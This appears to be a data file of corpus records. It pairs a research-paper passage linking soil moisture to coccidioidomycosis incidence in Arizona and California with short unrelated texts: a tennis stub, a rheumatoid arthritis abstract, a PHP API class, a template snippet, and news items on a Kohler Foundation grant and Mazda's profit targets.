the following monthly aggregations and lags are considered: (a) the number of months to aggregate of the independent variable (1 to 6). ", "That is, the average soil moisture from January to March (an aggregation of 3 months), only February (an aggregation of 1 month), or the entire first half of the calendar year (an aggregation of 6 months); (b) the number of months to aggregate of the dependent variable (1 to 6, a normalized estimate of reported coccidioidomycosis cases per 1,000,000 residents, with the annual trend removed), that is, we can estimate the total in August and September (an aggregation of 2 months) or a longer/shorter window; (c) the number of months of \"lag\" time between the independent range and the dependent range (0 to 36 months), for example, using the total number of hours above 10% between April and June of year *X* to forecast coccidioidomycosis in August and September and year *X* + 1 would represent a lag of 13 months; and (d) the 12 possible months (or aggregations thereof), to wit, utilizing a 3 month window for independent or dependent variables, one can consider January--March versus February--April versus March--May, etc.", "\n\nThe next section will outline how this analysis will refine that profusion of potential relationships into a coherent set of insights relating soil moisture estimates to reported cases of coccidioidomycosis.", "\n\n2.4. ", "Focusing the Lens {#gh216-sec-0006}\n----------------------\n\nOur methods are quite similar to those of *Wang et al*. ", "\\[[2007](#gh216-bib-0039){ref-type=\"ref\"}\\], beginning with the removal of a long‐term trend, the application of correlation analysis to lagged data, and even the usage of composites of temporal ranges by aggregating between time stamps for independent variable generation. ", "In Table [3](#gh216-tbl-0003){ref-type=\"table\"}, we visualize the average modeled soil moisture by month and the annually detrended number of reported coccidioidomycosis cases.", "\n\n###### \n\nSoil Moisture Levels and Coccidioidomycosis Impacts in Arizona and California\n\n Year Month Modeled SM (m^3^/m^3^), AZ Detrended Cocci Incidence, AZ Modeled SM (m^3^/m^3^), CA Detrended Cocci Incidence, CA\n ------ ------- ---------------------------- ------------------------------- ---------------------------- -------------------------------\n 2002 9 0.018688498 238.6835648 0 0\n 2002 10 0.030761552 291.4209886 0 0\n 2002 11 0.042590859 402.4278317 0 0\n 2002 12 0.079504266 314.7253879 0 0\n 2003 1 0.040706236 217.6314323 0 0\n 2003 2 0.047960111 118.9956718 0 0\n 2003 3 0.058734527 139.3982875 0 0\n 2003 4 0.023598582 93.20229356 0 0\n 2003 5 0.021576505 111.0593612 0 0\n 2003 6 0.032606535 140.6273795 0 0\n 2003 7 0.034824275 205.3632434 0 0\n 2003 8 0.063790721 316.7377084 0 0\n 2003 9 0.070075447 211.4483979 0 0\n 2003 10 0.073544563 213.733152 0 0\n 2003 11 0.07633426 195.8249965 0 0\n 2003 12 0.077928581 285.6830261 0 0\n 2004 1 0.080290731 211.9314125 0 0\n 2004 2 0.086659528 224.0742793 0 0\n 2004 3 0.091885505 178.9580231 0 0\n 2004 4 0.076389722 147.1321316 0 0\n 2004 5 0.048595993 249.0750831 0 0\n 2004 6 0.050074095 311.3864712 0 0\n 2004 7 0.053449079 297.3654862 0 0\n 2004 8 0.075714144 239.3006426 0 0\n 2004 9 0.08334769 272.7333319 0 0\n 2004 10 0.088344984 284.3028402 0 0\n 2004 11 0.114069337 244.1796974 0 0\n 2004 12 0.134465145 282.5061027 0 0\n 2005 1 0.14126691 160.2114796 0 0\n 2005 2 0.138735481 112.0010048 0 0\n 2005 3 0.069427576 119.1015506 0 0\n 2005 4 0.026501304 140.9278206 0 0\n 2005 5 0.029467254 126.9506981 0 0\n 2005 6 0.034264098 159.824663 0 0\n 2005 7 0.047369151 205.4515105 0 0\n 2005 8 0.121873645 271.667615 0 0\n 2005 9 0.084187959 173.3887346 0 0\n 2005 10 0.085661459 246.0509143 0 0\n 2005 11 0.075487162 394.0148302 0 0\n 2005 12 0.049257706 360.4681667 0 0\n 2006 1 0.047195764 223.8126685 0 0\n 2006 2 0.046754592 406.0198996 0 0\n 2006 3 0.06377237 321.6875436 0 0\n 2006 4 0.02168984 303.6157508 0 0\n 2006 5 0.020238768 250.91043 0 0\n 2006 6 0.033135632 262.8592065 0 0\n 2006 7 0.063432066 300.9350003 0 0\n 2006 8 0.07439608 237.5421378 0 0\n 2006 9 0.066061927 174.8022503 0 0\n 2006 10 0.049548081 181.9017814 0 0\n 2006 11 0.019553513 229.6054128 0 0\n 2006 12 0.028981184 385.3860391 0 0\n 2007 1 0.082276498 268.2745264 0 0\n 2007 2 0.045478735 218.1070116 0 0\n 2007 3 0.031602907 188.4985045 0 0\n 2007 4 0.030831453 222.0207718 0 0\n 2007 5 0.019434795 215.5676418 0 0\n 2007 6 0.020675259 208.739997 0 0\n 2007 7 0.059385878 194.8435303 0 0\n 2007 8 0.102940045 202.1052942 0 0\n 2007 9 0.056300585 154.3844403 0.014422721 73.24354314\n 2007 10 0.019089717 258.6904939 0.024020918 122.4520226\n 2007 11 0.020181495 328.867631 0.033769359 88.38095769\n 2007 12 0.1268061 284.8079076 0.093992526 141.1553566\n 2008 1 0.058864981 186.2714123 0.127940179 98.77108245\n 2008 2 0.087335354 183.1635086 0.136142251 84.16943733\n 2008 3 0.0312175 156.0432876 0.092026298 124.1939281\n 2008 4 0.018939927 184.5926911 0.031635149 138.2376122\n 2008 5 0.018688498 181.4596586 0.050772315 88.72175773\n 2008 6 0.035782162 169.1139229 0.055040674 148.2855919\n 2008 7 0.0974885 187.4741605 0.015210755 154.9923056\n 2008 8 0.060875011 168.7508884 0.014531239 209.7241664\n 2008 9 0.07512169 162.096754 0.014422721 187.3930841\n 2008 10 0.020771004 158.8994241 0.04266662 283.9230749\n 2008 11 0.026019206 234.5093129 0.090540463 229.5195126\n 2008 12 0.073159039 357.3659874 0.087234657 226.0364025\n 2009 1 0.090310458 208.6114782 0.099837552 205.0517373\n 2009 2 0.080561563 142.2644019 0.153602611 169.053763\n 2009 3 0.027221068 172.1079466 0.141206739 162.2426741\n 2009 4 0.030790148 200.0208542 0.106122067 167.963602\n 2009 5 0.024223187 255.0951336 0.099469892 186.0101461\n 2009 6 0.019587086 504.074028 0.070716571 240.6823074\n 2009 7 0.057748034 463.3385302 0.015893807 169.1293229\n 2009 8 0.042787633 400.7169535 0.019870677 256.5202823\n 2009 9 0.058145327 439.1085566 0.019882989 171.3287105\n 2009 10 0.022637066 435.7276248 0.079732534 177.9751628\n 2009 11 0.02392507 558.6542474 0.033060175 132.8129363\n 2009 12 0.063440636 449.4906599 0.1092558 163.2937272\n 2010 1 0.07671407 326.2683504 0.109604861 100.7023111\n 2010 2 0.119726452 313.5462057 0.128848332 96.26017989\n 2010 3 0.070742721 264.8940373 0.135993041 75.9748846\n 2010 4 0.024556352 270.9795176 0.151917328 132.6715156\n 2010 5 0.020438031 287.2457407 0.134641752 82.5704694\n 2010 6 0.018688498 327.7077512 0.058616255 164.3313195\n 2010 7 0.027323524 344.1021857 0.014422721 210.2631608\n 2010 8 0.064003282 345.901653 0.014422721 454.4814074\n 2010 9 0.028944447 355.8207601 0.014422721 593.7086878\n 2010 10 0.065683901 431.1084195 0.101268402 582.5730995\n 2010 11 0.023181293 484.2991517 0.118288892 333.3063386\n 2010 12 0.048068155 586.3832791 0.140973261 354.1640009\n 2011 1 0.055805589 502.2475781 0.090887304 158.7225719\n 2011 2 0.024228836 401.9814256 0.10315471 133.4254945\n 2011 3 0.036633795 481.0993594 0.160069858 106.374115\n 2011 4 0.034765333 473.9231599 0.132507947 112.7479356\n 2011 5 0.018688498 452.6495429 0.10387384 83.61927096\n 2011 6 0.018688498 455.186837 0.09917383 168.5966146\n 2011 7 0.051480698 480.1178372 0.06641851 171.2034696\n 2011 8 0.04691028 482.0019436 0.015082458 365.7117288\n 2011 9 0.062969664 335.0672556 0.044938206 397.2492863\n 2011 10 0.029757534 408.5573527 0.0677866 303.5982769\n 2011 11 0.081169463 465.1782025 0.054869883 258.751319\n 2011 12 0.113030655 441.0465071 0.01651865 229.0002529\n 2012 1 0.053559181 379.7756753 0.067839679 343.8025035\n 2012 2 0.024232378 375.8936545 0.105581676 264.8739533\n 2012 3 0.038539565 455.2590395 0.13065999 159.1349569\n 2012 4 0.03481477 469.8929287 0.149004521 128.2456794\n 2012 5 0.019257559 436.8999502 0.062313905 149.4690067\n 2012 6 0.029961968 388.2121592 0.05113879 152.0041124\n 2012 7 0.056216902 393.0521333 0.016870897 84.79048292\n 2012 8 0.079493489 252.761961 0.018147495 91.49446931\n 2012 9 0.059601122 204.2646714 0.014742877 111.4972694\n 2012 10 0.018797563 296.1976982 0.035507406 87.61401271\n 2012 11 0.031084186 320.5746086 0.094424432 88.10425661\n 2012 12 0.074000038 200.897139 0.157289468 93.24951635\n 2013 1 0.061580616 215.8309765 0.079910734 60.37819332\n 2013 2 0.097161785 189.9210826 0.06503031 74.84739532\n 2013 3 0.043805947 103.0214633 0.099472384 69.00899078\n 2013 4 0.023682717 102.1139398 0.102119484 65.23757778\n 2013 5 0.018688498 134.5468404 0.029101883 71.32973163\n 2013 6 0.018688498 180.7191826 0.032773113 88.66521014\n 2013 7 0.057232007 131.1258734 0.02314116 46.88582094\n 2013 8 0.04777314 197.0633332 0.014627682 47.77677455\n 2013 9 0.044216847 137.3913779 0.032197353 28.87948204\n 2013 10 0.018688498 129.1651728 0.036543682 35.1306167\n 2013 11 0.055693437 248.1182123 0.055573595 45.90899133\n 2013 12 0.089243157 222.1762911 0.056617057 74.27440333\n 2014 1 0.026467379 190.936132 0.020651353 42.60643006\n 2014 2 0.022966894 170.9610033 0.137219354 79.96855895\n 2014 3 0.034498843 223.2393164 0.119463294 34.32090332\n 2014 4 0.019020564 157.5879583 0.11920279 32.97535816\n 2014 5 0.018920869 232.5313611 0.090978637 55.46088978\n 2014 6 0.018688498 161.9626934 0.025230896 43.39143342\n 2014 7 0.093122684 93.59387799 0.03509858 58.15198009\n 2014 8 0.06704296 146.0930835 0.018512132 45.60214862\n 2014 9 0.078068763 109.0883894 0.030480576 49.30911926\n 2014 10 0.070803184 91.14695079 0.037730295 30.08484286\n 2014 11 0.020658284 132.0806601 0.077829588 25.89108171\n 2014 12 0.095039508 118.7038301 0.12214687 13.89858433\n\nIn California (upper panel), we observe that soil moisture arrives in clusters of roughly 6 months, which aligns with hydroclimatic research addressing Pacific climates, where precipitation arrives primarily during the fall/winter seasons \\[e.g., *", "Coopersmith et al*., [", "2012](#gh216-bib-0015){ref-type=\"ref\"}\\]. ", "In Arizona (lower panel), we observe soil moisture clusters of shorter periods of 3 months, aligning with the monsoon rainfall pattern of the arid Southwest. ", "Thus, for California and Arizona, we will aggregate soil moisture monthly averages into clusters of six and three, respectively. ", "In terms of the dependent variables, in California (upper panel), we notice clusters of roughly 3 months of coccidioidomycosis incidence that rise and fall in relation to the soil moisture levels observed, with lags of several months. ", "In Arizona, cocci responses seem inversely related (drier periods are succeeded by higher coccidioidomycosis incidence), with somewhat longer lag periods.", "\n\nTo distill a large number of comparisons, we focus on those that show the more significant, consistent, robust relationships. ", "If fewer than 18 comparisons are available, the comparison cannot be considered for use in the study. ", "A threshold of 18 has now been adopted to ensure at least one pair of independent and dependent ranges per county per year, from 2007 (the year at which precipitation data become available in California) and 2014 (when the incidence data set concludes). ", "For example, if we are considering comparisons of coccidioidomycosis incidence from February to March with the average in situ soil moisture estimate from June to August of the preceding summer, over all counties in California, a single data point is valid if, and only if, coccidioidomycosis estimates are available in that county in February and March, and in situ soil moisture estimates are available within that same county in June, July, and August of the previous year. ", "As stated, 18 such points are required before comparisons can be further considered.", "\n\nFinally, the statistically significant relationships that remain are examined in greater detail. ", "Relationships that \"recur\" or show higher rates of significance/correlation between the independent variable (a soil moisture measurement metric) and the dependent variable (reported cases of coccidioidomycosis) become the relationships concluded to be most robust. ", "Note a relationship \"recurs\" if the same independent variable demonstrates strong, statistically significant relationships between numerous temporal windows of the subsequent year.", "\n\n3. ", "Results {#gh216-sec-0007}\n==========\n\nIn this section, the results of the correlation analysis are deployed to evaluate the performance of those comparisons for the two states in question.", "\n\n3.1. ", "California {#gh216-sec-0008}\n---------------\n\nIn Tables [4](#gh216-tbl-0004){ref-type=\"table\"} and [5](#gh216-tbl-0005){ref-type=\"table\"}, we observe the positive correlation between average modeled soil moisture levels over a specific 6 month period (December‐to‐May) and the number of reported cases of coccidioidomycosis in the subsequent 3 month bands covering the summer and fall. ", "Table [5](#gh216-tbl-0005){ref-type=\"table\"} demonstrates the relationship between summer/fall incidence of coccidioidomycossis and the average soil moisture the preceding winter and spring. ", "The results of these relationships are summarized in Table [1](#gh216-tbl-0001){ref-type=\"table\"}, all of which are statistically significant at the *α* = 0.05 level.", "\n\n###### \n\nAnnually Detrended Cases of Coccidioidomycosis (July--September) Versus 6 Month Average Soil Moisture (December--May), California\n\n Modeled SM Reported Cases\n ------------ ----------------\n 0.115 115.5262\n 0.128 298.9765\n 0.122 227.4943\n 0.089 56.39648\n 0.089 12.70564\n 0.091 25.9088\n 0.089 41.74433\n 0.115 46.81051\n 0.128 36.58167\n 0.122 27.86085\n 0.089 21.22929\n 0.089 13.19565\n 0.091 13.49517\n 0.089 32.53876\n 0.115 36.65603\n 0.128 83.92622\n 0.122 56.03302\n 0.089 18.30164\n 0.089 15.2794\n 0.091 11.61712\n\n###### \n\nStatistically Significant Relationship Displaying Recurrent Patterns, California\n\n Ind_var Range Ind_var Type Dep_var Range *ρ* *p* Value *n*\n ------------------ ----------------------------------- --------------- ------- ----------- -----\n Dec--May (y^−1^) Average Soil Moisture (m^3^/m^3^) Jun--Aug 0.503 0.020 21\n Dec--May (y^−1^) Average Soil Moisture (m^3^/m^3^) Jul--Sep 0.539 0.012 21\n Dec--May (y^−1^) Average Soil Moisture (m^3^/m^3^) Aug--Oct 0.535 0.013 21\n Dec--May (y^−1^) Average Soil Moisture (m^3^/m^3^) Sep--Nov 0.529 0.014 21\n Dec--May (y^−1^) Average Soil Moisture (m^3^/m^3^) Oct--Dec 0.501 0.021 21\n\nIt is worth noting that all of these relationships illustrate summer/fall periods of coccidioidomycosis incidence responding to the same 6 month band beginning during the fall of the preceding year. ", "Interestingly, while the \"wetter\" 6 month bands do not necessarily cause a higher number of reported cases, the \"drier\" bands are fairly consistent with respect to their lower number of cases reported. ", "It is also important to note that, in Southern California, a disproportionate quantity of rainfall is observed during the fall/winter/early‐spring months, which would, in turn, suggest the greatest variability of soil moisture between December and May, which, in turn, displays consistent relationships with respect to coccidioidomycosis incidence during the summer and fall thereafter.", "\n\n3.2. ", "Arizona {#gh216-sec-0009}\n------------\n\nIn Tables [6](#gh216-tbl-0006){ref-type=\"table\"} and [7](#gh216-tbl-0007){ref-type=\"table\"}, we observe analogous examples in Arizona, albeit with an inverted statistical relationship. ", "Once again, we note that one particular band of average soil moisture values during the summer season when much of the Arizona rain falls presents statistically significant relationships with respect to coccidioidomycosis incidence in each month between January and May. All of these relationships are statistically significant at the *α* = 0.01 level. ", "Though the correlation is inverted, this would seem to corroborate the grow and blow hypothesis proposed by *Tamerius and Comrie* \\[[2011](#gh216-bib-0037){ref-type=\"ref\"}\\], in which drier periods allow spores to travel freely.", "\n\n###### \n\nAnnually Detrended Cases of Coccidioidomycosis (February) Versus 6 Month Average Soil Moisture (May--July), Arizona\n\n Modeled SM Reported Cases\n ------------ ----------------\n 0.030 90.0965\n 0.051 35.88342\n 0.037 144.1528\n 0.039 74.286\n 0.033 66.92434\n 0.051 55.48029\n 0.034 144.2103\n 0.022 194.4925\n 0.030 157.8867\n 0.035 64.43757\n 0.032 65.09426\n 0.030 70.94503\n 0.051 41.20407\n 0.037 125.5012\n 0.039 64.94447\n 0.033 58.86291\n 0.051 41.38267\n 0.034 80.80375\n 0.022 79.60832\n 0.030 98.13995\n 0.035 55.82523\n 0.032 54.94693\n 0.030 63.03275\n 0.051 34.91351\n 0.037 136.3659\n 0.039 78.87655\n 0.033 57.37626\n 0.051 45.40144\n 0.034 88.53221\n 0.022 127.8806\n 0.030 119.867\n 0.035 69.65828\n 0.032 50.91981\n 0.030 90.0965\n 0.051 35.88342\n 0.037 144.1528\n 0.039 74.286\n 0.033 66.92434\n 0.051 45.40144\n 0.034 88.53221\n 0.022 127.8806\n 0.030 119.867\n 0.035 69.65828\n 0.032 50.91981\n 0.051 45.40144\n 0.034 88.53221\n 0.022 127.8806\n 0.030 119.867\n\n###### \n\nStatistically Significant Relationship Displaying Recurrent Patterns, Arizona\n\n Ind_var Range Ind_var Type Dep_var Range *ρ* *p* Value *n*\n ------------------ ----------------------------------- --------------- -------- ----------- -----\n May--Jul (y^−1^) Average Soil Moisture (m^3^/m^3^) Jan −0.521 0.002 33\n May--Jul (y^−1^) Average Soil Moisture (m^3^/m^3^) Feb −0.552 0.001 33\n May--Jul (y^−1^) Average Soil Moisture (m^3^/m^3^) Mar −0.532 0.001 33\n May--Jul (y^−1^) Average Soil Moisture (m^3^/m^3^) Apr −0.449 0.009 33\n May--Jul (y^−1^) Average Soil Moisture (m^3^/m^3^) May −0.501 0.003 33\n\nAdditionally, much like the Californian results, in which wetter periods may or may not yield subsequent periods of higher incidence, but drier periods were consistently succeeded by lower number of reported cases of coccidioidomycosis, a similar pattern emerges in Arizona. ", "To wit, in Table [6](#gh216-tbl-0006){ref-type=\"table\"}, an extremely dry summer may or may not cause the highest levels of coccidioidomycosis incidence in the subsequent winter and spring, but an atypically wet summer produces consistently low incidence rates. ", "In California and Arizona, wet and dry conditions, respectively, are necessary, but not sufficient conditions for heightened incidence rates.", "\n\n4. ", "Discussion {#gh216-sec-0010}\n=============\n\n4.1. ", "The 21st Century Precipitation {#gh216-sec-0011}\n-----------------------------------\n\nUtilizing publically available California monthly precipitation data NOAA\\'s monthly data from appropriately located gauges in Arizona ([http://w2.weather.gov/climate/xmacis.php? ", "wfo=psr](http://w2.weather.gov/climate/xmacis.php?wfo=psr)) and California (<http://w2.weather.gov/climate/xmacis.php?wfo=lox>), one can observe qualitatively, some of the climatic patterns in play during the time periods in question. ", "With the USCRN precipitation record in California beginning in 2007 at most installation sites, Table [8](#gh216-tbl-0008){ref-type=\"table\"} presents the precipitation observed during each year from Southern California (near Los Angeles) and Arizona (near Phoenix). ", "In Table [3](#gh216-tbl-0003){ref-type=\"table\"}, we noted a gradual increase in the incidence of coccidioidomycosis, observing a spike in cases reported in 2011 (followed by a sharp decrease in 2012 and 2013). ", "In California, as our previous analysis would suggest, an atypically wet year in 2011 may have (at least temporarily) slowed a long‐standing positive trend. ", "Table [8](#gh216-tbl-0008){ref-type=\"table\"} presents the rainfall during each year. ", "However, the increase in 2011 (Table [9](#gh216-tbl-0009){ref-type=\"table\"}) may be exacerbated by an exceptionally wet 2010 followed by a drier summer in central Arizona (though not in the south), perhaps facilitating wider spreading of spores by wind, as hypothesized in *Kolivras and Comrie* \\[[2003](#gh216-bib-0024){ref-type=\"ref\"}\\]. ", "The steep dropoff thereafter may be, perhaps, partially explained by the extremely wet 2012. ", "Changes in surveillance methodologies, including changes in testing and reporting practices, may also have partially contributed to the 2011 peak \\[*Centers for Disease Control and Prevention*, [2013](#gh216-bib-0009){ref-type=\"ref\"}\\]. ", "For example, California transitioned to a laboratory‐based reporting system during 2010, though some jurisdictions such as Kern county had already been implementing such a reporting system \\[*Centers for Disease Control and Prevention*, [2013](#gh216-bib-0009){ref-type=\"ref\"}\\].", "\n\n###### \n\nPrecipitation During the California and Arizona Calendar Years\n\n Year Annual Precipitation (mm), AZ Annual Precipitation (mm), CA\n ------ ------------------------------- -------------------------------\n 2003 173.228 242.57\n 2004 202.692 414.528\n 2005 178.816 477.774\n 2006 138.43 233.172\n 2007 128.27 124.206\n 2008 243.332 279.908\n 2009 82.804 189.738\n 2010 232.156 509.27\n 2011 118.364 250.698\n 2012 108.712 225.806\n 2013 213.868 92.71\n 2014 212.598 242.57\n\n###### \n\nMonthly Incidence of Coccidioidomycosis per 1,000,000 Residents, Selected Counties in Arizona and California (2000--2014)\n\n Month \\# of Reported Cases per 1,000,000 Residents (Arizona) \\# of Reported Cases per 1,000,000 Residents (California)\n ------- -------------------------------------------------------- -----------------------------------------------------------\n 1 92.95431443 45.85162106\n 2 81.63523957 38.46853154\n 3 78.20629274 37.23905642\n 4 79.10389713 33.56534757\n 5 81.45724761 32.31102624\n 6 87.14588194 41.04605894\n 7 93.04145815 36.92932236\n 8 89.63543347 53.02804748\n 9 75.26866006 58.9060512\n 10 88.80439084 64.11905656\n 11 110.4812564 59.41757467\n 12 110.9498537 56.3356386\n\nThe Pacific Decadal Oscillation (PDO) is known to influence the variability of precipitation in the Southwest, specifically during Arizona winters \\[*Sheppard et al*., [", "2002](#gh216-bib-0034){ref-type=\"ref\"}\\]. ", "An image of the PDO from 1870 through the time period under inspection in this study can be located at <https://www.ncdc.noaa.gov/teleconnections/pdo/>. ", "The time period during which the spike in reported cases of coccidioidomycosis is observed in Arizona and California corresponds with the nadir of the Pacific Decadal Oscillation (PDO). ", "Shortly thereafter, as the sign of the PDO switches, a sharp decrease in coccidioidomycosis incidence is observed (Table [1](#gh216-tbl-0001){ref-type=\"table\"}). ", "The PDO\\'s connection to historical outbreaks of coccidioidomycosis could be researched by, in addition to removing a long‐term annual trend as shown in equations [(2)](#gh216-disp-0002){ref-type=\"disp-formula\"} and [(3)](#gh216-disp-0003){ref-type=\"disp-formula\"}, fitting a relationship between the PDO and coccidioidomycosis incidence. \"", "Sequential normalization\" specifies that multiple superimposed trends can be removed in order of the longest repeating period; see *Coopersmith et al*. ", "\\[[2011](#gh216-bib-0014){ref-type=\"ref\"}\\], leveraging a method from *Maidment and Parzen* \\[[1984](#gh216-bib-0027){ref-type=\"ref\"}\\]. ", "This would allow coccidioidomycosis incidence to explore in terms of moisture and anthropogenic features, in the absence of climatic trends.", "\n\n4.2. ", "Limitations {#gh216-sec-0012}\n----------------\n\nLimitations of coccidioidomycosis surveillance data include the passive nature of the surveillance system, which almost certainly underestimates the true number of cases. ", "In addition to the incubation period, some patients report experiencing substantial delays between seeking care as well as coccidioidomycosis diagnosis \\[*Tsang et al*., [", "2010](#gh216-bib-0038){ref-type=\"ref\"}\\], and further delays may occur between diagnosis and case reporting to public health. ", "Therefore, the month to which cases are assigned may not necessarily reflect the month that he or she was infected with *Coccidioides*. ", "Earlier analyses utilized time lags in their attempts to account for the time between exposure and symptom onset \\[e.g., *", "Park et al*., [", "2005](#gh216-bib-0030){ref-type=\"ref\"}\\], though a subsequent analysis of model sensitivity quality control determined that employing case data \"as is\" did not cause significant deterioration of results \\[*Comrie and Glueck*, [2005](#gh216-bib-0011){ref-type=\"ref\"}\\]. ", "Future analyses may allow for more comprehensive linkage between environmental conditions for *Coccidioides* growth and observed incidence by incorporating factors that account for dispersal and human exposure, ideally with methods to detect *Coccidioides* in air. ", "Currently, laboratory detection of airborne *Coccidioides* DNA has only been successful with artificially created dust clouds \\[*Chow et al*., [", "2016](#gh216-bib-0010){ref-type=\"ref\"}\\]. ", "However, future research is needed to enable this technology to be used for routine monitoring of *Coccidioides* in ambient air and to quantify spore count.", "\n\n5. ", "Conclusions {#gh216-sec-0013}\n==============\n\nUltimately, despite the differing hydroclimates presented by the data in Arizona and California, in both states, robust, significant, recurring relationships do emerge. ", "In both states, drought tends to correlate with higher incidence of reported coccidioidomycosis in the following year, whether that be a drier foresummer monsoon season in Arizona or a drier winter/spring in California. ", "In Arizona, these impacts tend to be noticed earlier in the subsequent year, whereas in California, these impacts are noted later in the year. ", "While other research challenges the impact of climatic factors in Kern county, CA \\[*Talamantes et al*., [", "2007](#gh216-bib-0036){ref-type=\"ref\"}\\], this analysis reveals relationships in California and Arizona using climatic data to produce a time series of soil moisture.", "\n\nWith the descriptive capacity of soil moisture verified by statistical significance tests and demonstrated over periods between several months and over 2 years, it is possible that future predictive models could enable public health officials to prospectively identify periods of expected increased coccidioidomycosis incidence and notify healthcare providers and the public to remain vigilant for identification of this infection, potentially minimizing delays in diagnosis. ", "We are hopeful that this analysis, in cooperation with subsequent research and stakeholders, will form the basis to do just that.", "\n\nThis work was supported by the NASA Terrestrial Hydrology Program (NNH10ZDA001N‐THP) and USDA Agricultural Research Service (ARS 58‐8042‐5‐077). ", "USDA is an equal opportunity provider and employer. ", "This work was also supported by NOAA through the Cooperative Institute for Climate and Satellites‐North Carolina under Cooperative Agreement NA14NES432003. ", "The reported cases of coccidioidomycosis were obtained from National Notifiable Diseases Surveillance System (NNDSS) available (<https://wwwn.cdc.gov/nndss/data-and-statistics.html>). ", "The findings and conclusions in this report are those of the authors and do not necessarily represent the official position of the Centers for Disease Control and Prevention.", "\n" ]
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[ "2012 Visit Panamá Cup – Singles\n\nRogério Dutra da Silva won the first edition of the tournament against Peter Polansky 6–3, 6–0 in the final.", "\n\nSeeds\n\nDraw\n\nFinals\n\nTop Half\n\nBottom Half\n\nReferences\n Main Draw\n Qualifying Draw\n\nVisit Panama Cup - Singles\n2012 Singles" ]
{ "pile_set_name": "Wikipedia (en)" }
[ 0.014184397163120567, 0 ]
[ "Induction therapy with combination TNF inhibitor and methotrexate in early rheumatoid arthritis.", "\nWith the introduction of more objective disease activity measures and the development of biological therapies, there were dramatic changes in the treatment of rheumatoid arthritis (RA). ", "The combination therapy with tumor necrosis factor (TNF) inhibitor and methotrexate (MTX) has unprecedentedly improved prognosis and outcomes, and very low disease activity or remission has been achievable goal in RA. ", "Although the concept of remission induction and maintenance was first discussed in longstanding RA patients, several clinical trials have demonstrated that there is a therapeutic window of opportunity, and early effective control of inflammation in early RA could lead to less joint damage and better long-term outcomes. ", "Emerging evidence suggests that early combination therapy with TNF inhibitor and MTX leads to rapid clinical remission and thereby improved quality of life. ", "Furthermore, remission status may be sustained in some patients even if a TNF inhibitor is discontinued after sustained remission in early RA patients. ", "While there are many potential benefits of early remission induction therapy with the combination of a TNF inhibitor and MTX, the best therapeutic regimen and strategy for remission induction and maintenance in early RA remain controversial. ", "There are no data to decide a priori when and in whom TNF blocker drugs are indicated in early disease-modifying anti-rheumatic drug (DMARD)-naïve RA." ]
{ "pile_set_name": "PubMed Abstracts" }
[ 0, 0.0106951871657754, 0, 0.006230529595015576, 0, 0, 0.004132231404958678, 0 ]
[ "<?", "php\n/*\n * Copyright 2016 Google Inc.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n * use this file except in compliance with the License. ", "You may obtain a copy of\n * the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ", "See the\n * License for the specific language governing permissions and limitations under\n * the License.", "\n */\n\nclass Google_Service_Storage_BucketVersioning extends Google_Model\n{\n public $enabled;\n\n public function setEnabled($enabled)\n {\n $this->enabled = $enabled;\n }\n public function getEnabled()\n {\n return $this->enabled;\n }\n}\n" ]
{ "pile_set_name": "Github" }
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[ "<br>\n<div class=\"container-fluid well\">\n <div class=\"text-center\">\n <span class=\"badge-user\">\n <strong>@lang('forum.forums'):</strong> {{ $num_forums }} |\n <strong>@lang('forum.topics'):</strong> {{ $num_topics }} |\n <strong>@lang('forum.posts'):</strong> {{ $num_posts }}\n </span>\n </div>\n</div>\n" ]
{ "pile_set_name": "Github" }
[ 0.008571428571428572 ]
[ "Kohler Foundation grant to fund Lakeland College Community Book Read\n\nDetails\n\nPublished: December 2, 2013\n\nLakeland College recently received a $3,000 grant from Kohler Foundation, Inc., to help fund the college's inaugural Community Book Read, which debuts next spring with Wisconsin native Chad Harbach, author of the best-seller novel \"The Art of Fielding.\"", "\n\nHarbach will be at Lakeland on April 15, 2014, as part of the book read. ", "The event, which is free and open to the public, begins at 7:30 p.m. in Lakeland's Bradley Theatre.", "\n\nHarbach will read excerpts from the novel and answer questions about the work and his life as an author and magazine editor. ", "Guests are encouraged to read \"The Art of Fielding\" prior to the event.", "\n\n\"The Art of Fielding,\" Harbach's debut novel, was named one of the New York Times' Ten Best Books of 2011. ", "Born is Racine, Harbach is a graduate of Harvard and the University of Virginia, and he is a cofounder and editor of n+1, a magazine journal of literature, politics and culture based in New York.", "\n\nThe Kohler Foundation is a non-profit, private foundation that supports arts and education through grants, scholarships, and preservation initiatives in Wisconsin and beyond. ", "Celebrating 70 years of its Distinguished Guest Series, Kohler Foundation brings world-class entertainment to the Village of Kohler at accessible prices." ]
{ "pile_set_name": "Pile-CC" }
[ 0.0110803324099723, 0, 0.020202020202020204, 0, 0, 0.01834862385321101, 0.020512820512820513, 0.005649717514124294, 0.013071895424836602 ]
[ "TOKYO (Reuters) -- Mazda Motor Corp. raised its mid-term profit target on Friday and said it aims to post 230 billion yen ($2.3 billion) in annual operating profit by the financial year ending in March 2016 after it hit its earlier target two years in advance.", "\n\nJapan's fifth biggest automaker by sales volume posted record 182.1 billion yen in operating profit for the financial year that ended in March, surpassing the previous mid-term profit goal of 150 billion yen, buoyed by a weaker yen that made its exporting business more profitable.", "\n\nMazda cut its global sales target in its mid-term target by 11 percent to 1.52 million vehicles, however.", "\n\nSeparately, Mazda said it agreed with Ford Motor Co. to start talks to sell the U.S. carmaker all of the Japanese company's stake in a joint venture that runs an assembly plant in Flat Rock, Mich.\n\nMazda posted an one-time extraordinary loss of 36.6 billion yen ($358 million) in the year that ended in March in anticipation of the loss it will see when it sells off its 50 percent stake in the joint venture -- AutoAlliance International.", "\n\nFord and Mazda currently each hold a 50 percent stake in the joint venture that operates the Flat Rock plant in Michigan. ", "Mazda, which stopped making the Mazda6 at the plant in August 2012, no longer manufactures any of its vehicles there, while Ford makes the Fusion mid-sized sedan and Mustang coupe at the plant.", "\n\nMazda began operations at a Mexico assembly plant in January, where it is manufacturing the Mazda3 and the Mazda2." ]
{ "pile_set_name": "Pile-CC" }
[ 0.007692307692307693, 0, 0.009345794392523364, 0.009070294784580499, 0.016129032258064516, 0.02072538860103627, 0.017241379310344827 ]
